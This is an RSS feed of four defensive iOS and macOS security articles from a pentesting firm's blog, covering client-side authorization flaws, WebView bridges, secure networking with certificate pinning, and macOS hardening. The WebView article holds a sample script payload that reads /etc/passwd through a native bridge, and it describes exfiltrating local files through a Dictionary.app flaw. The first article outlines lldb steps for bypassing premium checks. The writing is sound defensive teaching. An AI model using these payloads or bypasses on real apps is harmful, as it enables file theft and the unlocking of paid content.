<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Wojciech Reguła on Medium]]></title>
        <description><![CDATA[Stories by Wojciech Reguła on Medium]]></description>
        <link>https://medium.com/@wojciechregula?source=rss-4698055bdb3------2</link>
        
        <generator>Medium</generator>
        <lastBuildDate>Sun, 10 May 2026 23:38:13 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@wojciechregula/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Vulnerabilities and Threats in Local Authorization on iOS Devices — Securing]]></title>
            <link>https://medium.com/securing/vulnerabilities-and-threats-in-local-authorization-on-ios-devices-securing-60e30d399329?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/60e30d399329</guid>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[itsec]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[it-security]]></category>
            <category><![CDATA[ios]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Wed, 12 Jan 2022 12:05:32 GMT</pubDate>
            <atom:updated>2022-03-08T08:30:39.911Z</atom:updated>
            <content:encoded><![CDATA[<h3>Vulnerabilities and Threats in Local Authorization on iOS Devices — Securing</h3><p>We present potential threats of performing local authorization on iOS. You will learn how to protect your resources against unauthorized access.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dYXRIZVjkrA9KrBeJWNbFA.png" /></figure><h3>TL;DR</h3><ul><li>All checks done on the device can be bypassed</li><li>Move access control logic to the server</li><li>If you support in-app purchases always verify receipt server-server</li></ul><h3>Context</h3><p>As the “mobile-first” slogan became a truth, the market moved the crucial functionalities to the mobile applications. It is natural that complicated applications restrict access to information, data or features. This article shows three patterns that I commonly observe during iOS app pentests. They are all caused by overtrust in the devices and the client-side checks. As the devices shouldn’t be trusted, developers have to keep in mind that any client-side check can be bypassed.</p><h3>Vulnerability 1: Managing users — Cross-role access control on iOS</h3><p>The first common vulnerable pattern is improper verification if the currently logged user has a proper role to perform certain action. Consider the following scenario:</p><ol><li>After the first startup, the user logs in.</li><li>The backend returns an OAuth token containing the role</li><li>The application verifies the token by checking the signature</li><li>If the validation succeeded, the app saves the user’s role in the user defaults</li><li>Based on that role application grants access to the proper views</li></ol><p>The problem starts when the server doesn’t verify if the user should even have access to that view. The user sends a HTTP request without having an appropriate role. Since the server accepts that request, the attacker performed an action that shouldn’t have access to.</p><p>Proof of concept:</p><p>The analyzed application saves the role in the user defaults that was observed using Passionfruit:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*JHxBWJA_SA-dsmQn.png" /></figure><p>The attacker attached lldb and overwritten the role value:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*me1ZXlUjA4pF3fwC.png" /></figure><p>Now the Passionfruit shows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Hnv9yBJA_J_HVcsY.png" /></figure><h3>Vulnerability 2: Locked features</h3><p>Another example of a bad pattern is restricting features / access to resources that are already on the devices. Once, during pentests I analyzed a video streaming application that was restricting access to videos. If the user had bought access to the movie they could open it. I investigated how the validation mechanism works. As it turned out, the videos were downloaded on the device and then the access validation was performed. Let’s consider the following Swift code:</p><pre>static func hasPremium() -&gt; Bool <br>{ <br>if someLogic() { <br>return true <br>} <br>return false <br>}</pre><p>The code contains a function checking if the user has a premium account. It returns a boolean accordingly. The easiest way to bypass that logic is to attach the lldb and change the return function.</p><p>So, let’s set a breakpoint on the <em>hasPremium</em> function.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*cgSE_d1gB2qFXWUd.png" /></figure><p>Continue the execution of the application.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*JXUkHU2DtgQ_e6MV.png" /></figure><p>Then go right after the function and change the value of <em>x0</em> register.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*gELXH1bz1PjUVyJT.png" /></figure><p>As you can see in the screenshot below, we were able to change the code execution flow and modify the returned value. Make a notice that we’ve done that in the application coded in Swift. I heard from developers many times that Swift is not Objective-C and cannot be easily manipulated. We’ve just confirmed where the truth lies.</p><h3>Threats in In-app purchases on iOS</h3><p>Purchases that users make in the application are the most obvious way to monetize the applications. Abusing the purchases in your application may directly harass your business, so I decided to write a subsection especially for that problem. Implementing a secure application with purchases has to start during the architecture creation process. If you implement your application incorrectly it may lead to bugs described in the previous subsections. You may say — “how many clients will be security experts being able to attach a debugger and modify the code execution flow?”. Rather not many. However, in most cases, the potential attackers don’t have to be security experts or even developers. There are universal tweaks available which every script kiddie can install. Take a look at the <a href="https://techinformerz.com/localiapstore/">https://techinformerz.com/localiapstore/</a>. Another scenario is that a “security expert” will patch your application and place it in the jailbreakers store. So, again, any script kiddie will be able to get your application with all the premium content.</p><p>On the screenshot below you can see the transaction process using Apple’s standard StoreKit API.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*tMSnvWb8plWiTnEN.png" /></figure><p>The user taps the buy button, the App Store’s alert is displayed, the user pays for the product and Apple sends you a receipt. It’s on your side now to validate if the receipt is valid and grant access to the bought resources. According to Apple’s <a href="https://developer.apple.com/videos/play/wwdc2018/704/">documentation</a>, the receipt contains purchase Information, certificates and signature. As you probably guess, if you do the receipt validation locally in your application you lost the battle. The only way to do it securely is to move the access logic to your server! So, the algorithm should be:</p><ol><li>The user buys a product</li><li>The Apple’s receipt is delivered to the user’s device</li><li>The user’s device sends the receipt to your server along with the session identifier (You have to know who sent the receipt)</li><li>The server sends the receipt to Apple using this <a href="https://developer.apple.com/documentation/appstorereceipts">API</a>.</li></ol><p>Now your server knows if the user bought the product or not. The server should decide whether the access should be granted or not. Please remember that the attacker may change the HTTP responses that the server sends to your application. Make sure you have designed the application architecture well.</p><h3>Summary</h3><p>The purpose of this article was to warn you about the potential threats of performing local authorization. If you are interested in other aspects of mobile application security we highly recommend you our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition</a></p><p>As you saw in this article, attackers can modify everything that is stored on their devices. Most of the protections can be bypassed even by the inexperienced person knowing a little bit of simple reverse engineering methodologies. If your business is to sell premium content via application, make sure you do that correctly. As there is usually no need to use sophisticated methods requiring more than installing one simple tweak, even script kiddies can harm your business. The conclusion is very straightforward — keep as much authorization logic as possible on your server.</p><p>If you have any questions about this article feel free to <a href="https://www.securing.pl/en/contact">contact us</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/pl/vulnerabilities-and-threats-in-local-authorization-on-ios-devices/"><em>https://www.securing.pl</em></a><em> on January 12, 2022.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=60e30d399329" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/vulnerabilities-and-threats-in-local-authorization-on-ios-devices-securing-60e30d399329">Vulnerabilities and Threats in Local Authorization on iOS Devices — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Secure implementation of WebView in iOS applications — Securing]]></title>
            <link>https://medium.com/securing/secure-implementation-of-webview-in-ios-applications-securing-799c0aa8d5?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/799c0aa8d5</guid>
            <category><![CDATA[itsec]]></category>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[app-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Thu, 07 Oct 2021 09:32:24 GMT</pubDate>
            <atom:updated>2021-11-08T11:28:18.364Z</atom:updated>
            <content:encoded><![CDATA[<h3>Secure implementation of WebView in iOS applications — Securing</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MmKqaHkhQznZGH6StLUrMA.jpeg" /></figure><h3>TL;DR</h3><ul><li>Do not use UIWebView.</li><li>Make sure your Info.plist doesn’t contain App Transport Security Exceptions.</li><li>Follow the least privilege principle.</li><li>Consider disabling JavaScript.</li><li>Code JavaScript-ObjC/Swift bridges carefully.</li><li>Follow good mobile application development practices -&gt; see our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition </a>.</li></ul><h3>Context</h3><p>Recently I had a chance to observe a lot of new WebView applications, so I decided to create this article. A few years ago, if someone wanted to create a multiplatform application it was almost necessary to create a different codebase on each platform. Then, the cross-platform frameworks entered the market that made universal coding easier. One way of universal coding is to use WebView. The idea was simple — create an application in web technologies (HTML, CSS, JS) and render it within the native application. So, WebView is just an embedded browser in your application. Such a technology introduced vulnerabilities characteristic to web applications to native applications. Since WebView can be treated as a browser it uses the same mechanisms that can be abused as well. As it turned out, the exploitation results can be even more harmful. What if the application wants to obtain some resources saved on your device like photos or contacts? Well, developers need to create JavaScript&lt;-&gt;Objective-C/Swift bridges that can be exploited using simple Cross-Site Scripting vulnerability. In the next subsection, I will show you how to create secure WebView applications including the most common threats.</p><h3>Deprecated UIWebView — major security flaw</h3><p>This subsection could be shortened to “do not use UIWebViews”. The UIWebView is the old Apple’s API present in iOS since version 2.0, so since 2008. If you follow the history of the vulnerabilities you probably know that in 2008 most of the modern browser security features were not yet invented. Do not expect the API created released in 2008 to implement those security mechanisms either. The UIWebView was deprecated in iOS 12.0 and should no longer be used in your code. If your application still uses the UIWebView, the best recommendation I can give you is to rewrite it to WKWebView. Before you start doing the refactoring, I’d suggest reading the next subsection about WKWebViews as their implementation can be coded insecurely too.</p><p>But why do I not recommend using the UIWebView? If you need concrete arguments, you can find them below:</p><ol><li>UIWebView doesn’t have a functionality that allows disabling JavaScript. So if your application doesn’t use JS and you want to follow the least privilege principle, you cannot switch it off.</li><li>There is no feature handling mixed content. You cannot verify if everything was loaded using HTTPS protocol. his functionality shouldn’t be a case, because you shouldn’t add any App Transport Security exceptions (exceptions that allow insecure HTTP connections).</li><li>UIWebView doesn’t implement the out-of-process rendering as WKWebView does. So, if attackers find a memory corruption vulnerability in the UIWebView they will be able to exploit it in the context of your application.</li><li>File access via<em> file://</em> scheme is always turned on. What’s even worse is accessing files via that scheme doesn’t follow the Same Origin Policy mechanism. It means that if the attackers exploit a Cross-Site Scripting vulnerability in your WebView they can load files available from the application’s sandbox and then send them to their server.</li></ol><p>As a good example of insecurity UIWebView I’ll show you a <a href="https://support.apple.com/lv-lv/HT209139">vulnerability</a> I found in Apple’s Dictionary.app on macOS:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*zu1Pc9K1wfexpQh2.png" /></figure><p>The Dictionary.app allows of course translation from language A to B. Apple wasn’t able to create all dictionaries, so you can create yourdictionary with for example an ethnic dialect. The translated words were then displayed in the UIWebView without any validation. I was wondering if there is a possibility to exploit the <em>file://</em> handler and steal local files, so I created the following dictionary entry:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*A2baR9xXFHKLLIgA.png" /></figure><p>Then, I opened the Dictionary.app, launched netcat on 127.0.0.1:8000 and contents of the <em>/etc/passwd</em> were transferred:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*3nlIanodAmU_bzgC.png" /></figure><p>I think you are now convinced that using UIWebView is strongly not recommended.</p><h3>WKWebView on iOS devices</h3><p>WKWebView is that API you should use to load web content in your application. The “WK” prefix comes from the WebKit, the browser engine. The WKWebView is a modern API applying all the modern web security mechanisms, it’s still maintained by Apple and gets updates. The good thing about WKWebView is that it does out-of-process rendering, so if the attackers find a memory corruption vulnerability in it, your application’s process is still isolated.</p><p>Let’s start from the <em>Info.plist</em> configuration. In the article about secure networking on iOS I wrote about App Transport Security exceptions. The recommendations apply also for the WKWebView. Make sure you do not allow unencrypted HTTP connections. The WKWebView can be treated as a web browser, so if the attacker can perform a Man-In-The-Middle attack, they can steal your cookies/authorization tokens, execute JavaScript in your app’s context and thus for example call JavaScript&lt;-&gt;Objective-C/Swift bridges. You can verify if the content was loaded fully with encrypted connections with the following code:</p><pre>import UIKit</pre><pre>import WebKit</pre><pre>class ViewController: UIViewController {</pre><pre>@IBOutlet weak var webContentView: UIView!</pre><pre>var configuration: WKWebViewConfiguration ?</pre><pre>var webView: WKWebView ?</pre><pre>override func loadWebView() {</pre><pre>self.configuration = WKWebViewConfiguration()</pre><pre>self.webView = WKWebView(frame: self.webContentView.bounds, configuration:configuration!)</pre><pre>self.webContentView.addSubview(self.webView!)</pre><pre>let url = URL(string: &quot;https://securing.biz&quot;) !</pre><pre>let request = URLRequest(url: url)</pre><pre>self.webView!.load(request)</pre><pre>print(&quot;Has only secure content?: \(self.webView!.hasOnlySecureContent)&quot;)</pre><pre>}</pre><pre>}</pre><p>Then, you need to somehow load the HTML content. There are two approaches: the first one loads HTML content from the application’s package (local) and the second is to load the HTML content from your website. Make sure you load content that you fully control. If you load JavaScript code from the external resources, you can verify it’s cryptographic <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/script">hash</a> with <em>integrity</em> attributes. For high-risk applications, it’s recommended to apply reverse engineering protections. In the WebView world, you can minify the JavaScript files or even obfuscate them.</p><p>Now, let’s talk about the hardening. The <em>file://</em> scheme is always enabled in the WKWebView, but it cannot (by default) access files. That mechanism can be enabled, but please keep in mind the least privilege principle. If your WebView doesn’t necessarily have to access files don’t turn it on.</p><p>The opposite thing is a JavaScript interpreter that is turned on by default. If your website doesn’t use JS, it’s recommended (again — the least privilege principle) to turn it off. You can use the following code:</p><pre>let webPreferences = WKPreferences() webPreferences.javaScriptEnabled = false self.configuration?.preferences = webPreferences</pre><p>The last feature that I wanted to discuss in this article are bridges. The WKWebView allows calling native code from JavaScript. You now probably realize how harmful it could be if not properly coded. Two years ago I was pentesting an iOS application that used such bridges to get photos from the user’s photo library. As I found a Stored Cross-Site Scripting Vulnerability that allowed me to execute JavaScript code on every instance of that application, I was able to steal all the photos from users’ photo libraries and send them to my server. The native code is called via postMessage API.</p><p>Native code:</p><pre>// first register the controller</pre><pre>self.configuration?.userContentController.add(self, name: &quot;SystemAPI&quot;)</pre><pre>[...]</pre><pre>// and expose native methods</pre><pre>extension ViewController : WKScriptMessageHandler {</pre><pre>func userContentController(_ userContentController: WKUserContentController, didReceive message: WKScriptMessage) {</pre><pre>if message.name == &quot;SystemAPI&quot; {</pre><pre>guard let dictionary = message.body as? [String: AnyObject],</pre><pre>let command = dictionary[&quot;command&quot;] as? String,</pre><pre>let parameter = dictionary[&quot;parameter&quot;] as? String else {</pre><pre>return</pre><pre>}</pre><pre>switch command {</pre><pre>case &quot;loadFile&quot;:</pre><pre>loadFile(path: parameter)</pre><pre>case &quot;loadContact&quot;:</pre><pre>loadContact(name: parameter)</pre><pre>default:</pre><pre>print(&quot;Command not recognized&quot;)</pre><pre>}</pre><pre>}</pre><pre>}</pre><pre>}</pre><p>JavaScript code:</p><pre>&lt;script&gt; <br>window.webkit.messageHandlers.SystemAPI.postMessage({ &quot;command&quot;:&quot;loadFile&quot;, &quot;parameter&quot;:&quot;/etc/passwd&quot;});<br>&lt;/script&gt;</pre><p>The code example I pasted is of course not well-designed because it allows loading any file or any contact. When coding bridges make sure your methods are as limited as possible. So even if the attackers will somehow inject code to your WebView the attack surface will be tight. So, do not expose excessive methods, strictly validate the parameters and make them limited (in this case instead of loading file from path, you can load files by ID from the specified in the function directory). In order to additionally prevent Cross-Site Scripting vulnerabilities consider also implementing the Content Security Policy mechanism. Despite it’s only an additional layer of security it can stop the attackers by blocking XSS vulnerabilities.</p><h3>Summary</h3><p>Using WebViews in native applications may boost the development, as the same HTML/CSS/JS code can be used across all the platforms the application supports. That technology is indeed convenient but comes with new risks. In this article, I wanted to show you 2 APIs present in Apple’s environment. The old one — UIWebView is considered insecure and should no longer be used. WKWebView is the right API to implement WebViews. Unfortunately, using even the modern API may lead to vulnerabilities. Developers have to make sure that their code is not vulnerable to both web-related and native attacks. This article presented how to implement secure WebViews and how to limit the attack surface.</p><p>During the iOS application development process, it’s also critical to follow best practices. We’ve put up a handbook that compiles all of our iOS security knowledge into one place. You may go to it by clicking on the link below.</p><p>Feel free to reach me out. You can find me on <a href="https://twitter.com/_r3ggi">Twitter </a>on <a href="https://www.linkedin.com/in/wojciech-regula/">LinkedIn</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/secure-implementation-of-webview-in-ios-applications/"><em>https://www.securing.pl</em></a><em> on October 7, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=799c0aa8d5" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/secure-implementation-of-webview-in-ios-applications-securing-799c0aa8d5">Secure implementation of WebView in iOS applications — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Key aspects of secure networking on iOS — Securing]]></title>
            <link>https://medium.com/securing/key-aspects-of-secure-networking-on-ios-securing-f437e584a5d4?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/f437e584a5d4</guid>
            <category><![CDATA[ios-app-development]]></category>
            <category><![CDATA[application-security]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[ios]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Tue, 08 Jun 2021 11:25:48 GMT</pubDate>
            <atom:updated>2021-09-02T13:21:42.876Z</atom:updated>
            <content:encoded><![CDATA[<h3>Key aspects of secure networking on iOS — Securing</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ks4AquGOqw56AvhOprXIsw.jpeg" /></figure><h3>TL;DR</h3><ul><li>Stop using HTTP, use HTTPS.</li><li>App Transport Security exceptions shouldn’t be set on production environments.</li><li>If you use third party networking libraries, verify the secure connection.</li><li>For high risk applications, use certificate pinning.</li><li>Always follow good mobile application development practices -&gt; see our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition</a>.</li></ul><h3>Context</h3><p>Most applications on our mobile devices talk with a backend. Offline applications are rarely used and even if there is no need to login, there is usually a need to have at least analytics. We wish there was no need to say that — because networking seems to be pretty obvious — but it’s not uncommon that apps make insecure connections. During pentests, from time to time we observe applications that use plain-text HTTP communication to transmit user’s credentials. This article will show you from the very beginning how to implement secure networking on iOS and what should be avoided.</p><h3>Forbidden HTTP communication on iOS</h3><p>Using HTTP in your application means that all the data you send is not encrypted. In other words, any attacker in a privileged network position may retrieve the information your app has sent. It also means that if your app’s user connects to a public hotspot, any person will be able to sniff that traffic. HTTP is purely outdated, do not use it. Starting from iOS 9, developers who want to use HTTP have to set a proper App Transport Security exception. You will read more on that later. To present you a proof of concept, we have created a simple Swift application.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*CpUOBMhOHbuvqhk_.png" /></figure><p>This application sends a supplied login and password to <a href="http://securing.biz/">http://securing.biz</a>. Let’s take a look at the code below:</p><pre>import Foundation</pre><pre>let url = URL(string: &quot;http://www.securing.biz&quot;) !func performLogin(login: String, password: String) - &gt; Void {</pre><pre>let session = URLSession.shared</pre><pre>var request = URLRequest(url: url) request.httpMethod = &quot;POST&quot;</pre><pre>let parameters = &quot;login=\(login)&amp;password=\(password)&quot;</pre><pre>request.httpBody = parameters.data(using: .utf8) let task = session.dataTask(with: request, completionHandler: {</pre><pre>data,</pre><pre>response,</pre><pre>error in</pre><pre>if let receivedData = data {</pre><pre>  print(&quot;\(receivedData)&quot;)</pre><pre>}</pre><pre>}) task.resume()</pre><pre>}</pre><p>It uses a standard URLSession.shared singleton and sends a HTTP request. As we have mentioned earlier, this code will fail as we didn’t set the required exceptions. So, we opened the Info.plist file and added the following XML code:</p><pre>&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;<br> &lt;dict&gt;<br>  &lt;key&gt;NSExceptionDomains&lt;/key&gt;<br>  &lt;dict&gt;<br>   &lt;key&gt;www.securing.biz&lt;/key&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;NSExceptionAllowsInsecureHTTPLoads&lt;/key&gt;<br>    &lt;true/&gt;<br>   &lt;/dict&gt;<br>  &lt;/dict&gt;<br>&lt;/dict&gt;</pre><p>The code is self-descriptive. It allows the app to initiate HTTP loads. You can read more about the exceptions in the <a href="https://developer.apple.com/documentation/bundleresources/information_property_list/nsapptransportsecurity">official docs</a>.</p><p>The Info.plist file is a good place to verify if the application conforms to best practices. <strong>Before deploying your application on production, search for App Transport Security exceptions.</strong> Returning to the application, we compiled it and installed it on the device. In order to sniff the traffic, we had to be in the privileged network position. The easiest way to do this on macOS is to open a personal hotspot in the Sharing options. So we did and connected the iPhone to our Wi-Fi. Then, we opened Wireshark and started sniffing the hotspot’s interface. After we supplied the login and password, we clicked the “Log in” button. In the Wireshark we observed the traffic.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/832/0*v5C1UaIPUBW5SCbG.png" /></figure><p>As you can see, the credentials were sniffed. Please keep that in mind and forget about HTTP in production applications.</p><h3>HTTPS communication — the correct way</h3><p>This protocol provides encrypted communication. There are some traps on the server’s configuration, but we will not discuss it in this article. We will focus on iOS applications. Developers usually select third party networking libraries in HTTP communication. It is more convenient, but also creates new risks. AFNetworking, a popular library, allowed a Man-In-The-Middle attack in version 2.5.1 when the application didn’t use the certificate pinning. <strong>So, when you decide to use external networking sources, verify the networking attack scenarios in order to be sure you do not expose your customers to risk.</strong></p><p>As the intention of this article was to be practical, we will do networking with one of the most popular Swift libraries — AFNetworking. If you have any questions about networking implementation with the use of standard Apple’s API, feel free to contact SecuRing.</p><p>Let’s replace the previously introduced performLogin function with a new one:</p><pre>func performLoginWithAlamofire(login: String, password: String) - &gt; Void {</pre><pre>struct Parameters: Encodable {</pre><pre>let login: String</pre><pre>let password: String</pre><pre>}</pre><pre>let parameters = Parameters(login: login, password: password) AF.request(url, method: .post, parameters: parameters, encoder: URLEncodedFormParameterEncoder.default).response {</pre><pre>response in print(&quot;ALAMOFIRE \(response)&quot;)</pre><pre>}</pre><pre>}</pre><p>In the meanwhile, we opened BURP Suite, an HTTP(S) proxy and modified the proxy settings on our iPhone to point to the BURP’s IP and port. When we clicked the “Log in” button, nothing happened. However, the BURP showed an error message:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*ZKFuz2CAIRNnJ7FH.png" /></figure><p>Now we confirmed that the application refused connection to our proxy server as the server was not able to provide a trusted SSL certificate for the securing.biz domain. But what if one of the Certificates Authorities gets compromised and the attacker is be able to create such a trusted SSL certificate? Or what if the attacker somehow installed a trusted SSL certificate on the victim’s device? Here comes the “certificate pinning” technique to prevent such a scenario.</p><h3>Certificate Pinning on iOS devices</h3><p>Certificate pinning is a technique that protects against connecting to your domain using SSL certificates other than your own. The mechanism can be implemented in several ways. The most popular are: pinning the whole certificate, server’s public key or pinning the cryptographic hash of the certificate. You can read more about certificate pinning in <a href="https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning">OWASP documentation</a>.</p><p>The example below shows how we implemented certificates pinning in our sample application using the Alamofire:</p><pre>import Alamofire</pre><pre>let url = URL(string: &quot;https://securing.biz&quot;) !class NetworkManager {</pre><pre>static</pre><pre>let shared: NetworkManager = NetworkManager(url: url) let manager: Session init(url: URL) {</pre><pre>let configuration: URLSessionConfiguration = URLSessionConfiguration.default</pre><pre>let evaluators: [String: ServerTrustEvaluating] = [&quot;securing.biz&quot;: PinnedCertificatesTrustEvaluator()]</pre><pre>let serverTrustManager: ServerTrustManager = ServerTrustManager(evaluators: evaluators) manager = Session(configuration: configuration, serverTrustManager: serverTrustManager)</pre><pre>}</pre><pre>}</pre><pre>func performLoginWithAlamofireAndCertificatePinning(login: String, password: String) - &gt; Void {</pre><pre>struct Parameters: Encodable {</pre><pre>let login: String</pre><pre>let password: String</pre><pre>}</pre><pre>let parameters = Parameters(login: login, password: password) NetworkManager.shared.manager.request(url, method: .post, parameters: parameters, encoder: URLEncodedFormParameterEncoder.default).response {</pre><pre>response in print(&quot;ALAMOFIRE \(response)&quot;)</pre><pre>}</pre><pre>}</pre><p>So, we implemented a NetworkManager singleton class that specifies the pinning policy to the whole SSL certificate we placed in the app’s resources (DER formatted). Alamofire will load that certificate automatically. Then, we created a shared manager Session object that is then used to perform the HTTP connection.</p><p>We installed the application on the device. In order to verify if the certificate pinning works correctly, we also installed a SSL certificate and added it to the trusted CA’s. After clicking the “Log in” button, the BURP suite again showed the error:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*ZfAnUsAQ5hm2042A.png" /></figure><p>That behavior proves that the pinning worked as expected. Our connection is now immune to an attacker who will not present our SSL certificate.</p><h3>Summary</h3><p>Secure networking awareness is growing from year to year. More and more applications are compliant with the best practices. However, sometimes we observe applications that use unencrypted HTTP. Apple also tries to prevent such insecure practices with the App Transport Security Mechanism. As we showed in this article, it may be harmful to the users. The HTTP should no longer be used in production environments. Using HTTPS is a proper way, however it also comes with the risk of trusting invalid certificates. We always recommend testing the basic SSL substitution scenarios to be sure that an application is well written. Some of you may be also interested in implementing the certificate pinning mechanism for high risk applications. We hope the knowledge shared in this article will help you create secure iOS applications.</p><p>It is also important to adhere to best practices during the iOS application development process. We have prepared a guide that collects our iOS security experience in one place. You can access it below.</p><p>Also, feel free to reach me out. You can find me on <a href="https://twitter.com/_r3ggi">Twitter</a> on <a href="https://www.linkedin.com/in/wojciech-regula/">LinkedIn</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/key-aspects-of-secure-networking-on-ios/"><em>https://www.securing.pl</em></a><em> on June 8, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=f437e584a5d4" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/key-aspects-of-secure-networking-on-ios-securing-f437e584a5d4">Key aspects of secure networking on iOS — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[5 security tips for your macOS environment — Securing]]></title>
            <link>https://medium.com/securing/5-security-tips-for-your-macos-environment-securing-b8b259e0f564?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/b8b259e0f564</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[mac-admin]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[infrastructure-security]]></category>
            <category><![CDATA[macos]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Wed, 28 Apr 2021 12:02:25 GMT</pubDate>
            <atom:updated>2021-06-04T08:55:02.893Z</atom:updated>
            <content:encoded><![CDATA[<h3>5 security tips for your macOS environment</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Jr1DCMN74DcCYF8oBghFeQ.jpeg" /></figure><p>Nowadays, Macs cannot be treated as a niche platform in companies. We meet Macs in all sized companies — from startups to big companies with thousands of employees. It’s not a big surprise that this fact was also noticed by attackers. During the security assessment, SecuRing team observed that usually Mac environments are in most cases quite immature and stand out from widely adopted Windows environments. This article will give you 5 tips that radically improve security of your MacOS infrastructure.</p><h3>Tip #1: Enroll your Macs into MDM</h3><p>We observed situations when even in big companies Macs were unmanaged. Users could perform actions whatever they wanted. At the same time, these computers were connected to internal companies’ resources. Such a situation shouldn’t ever take place. Make sure you can control all Macs in your infrastructure, enforce security policies, install and update new software, detect potential threats and monitor suspicious actions.</p><h3>Tip #2: Allowlist executables</h3><p>Modern MacOS versions have a lot of security improvements. Mechanisms like Notarization, Malware Removal Tool, and GateKeeper help users stay not infected. However, those features are not bulletproof. We have seen notarized malware that successfully bypassed all those enhancements. Implementing an allowlist of applications that can be launched can dramatically reduce the attack surface. Even if users somehow download a notarized by Apple malware, they won’t be able to launch it.</p><h3>Tip #3: Implement multi-factor authentication</h3><p>What about phishing campaigns that do not require any software to be installed? Stealing your users’ password that will allow accessing your Jira doesn’t sound good either. <a href="https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/">Research</a> shows that hardware tokens (U2F) let Google keep out their over 85,000 employees not phished since 2017 (research ended in 2018). Implementing U2F is really rewarding. Consider requiring the U2F also during the users log in to their macOS machines.</p><h3>Tip #4: Enforce security policies</h3><p>We are all used to security policies enforced on Windows machines (Group Policies). Why don’t implement such requirements on Macs? A feature that you are looking for is called <a href="https://support.apple.com/en-gb/guide/mac-help/mh35561/mac">Profiles</a>. It can help you enforce secure passwords, a maximum idle time before locking the screen, disallowing turning off the disk encryption, properly setting up the firewall, and many other useful things.</p><h3>Tip #5: Make sure your Macs are up-to-date</h3><p>This idea looks the most obvious, albeit it’s not. It’s widely known that updating machines is important and protects users from getting infected by malware or attackers that use known vulnerabilities. SecuRing team observed in macOS environments that users procrastinate with updates containing even critical security fixes. A solution for that may be enforcing the minimum OS version. If users don’t update their machines, they won’t be able to access the company’s resources.</p><h3>To sum up</h3><p>Keep in mind that every operating system in your organization must be treated with the same degree of trust. Attacks on macOS environments are no longer a legend. These 5 quick tips I gave you are a good start to improve your macOS infrastructure security. If you are interested in a bespoke analysis — feel free to reach out to me.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/5-security-tips-for-your-macos-environment/"><em>https://www.securing.pl</em></a><em> on April 28, 2021.</em></p><img 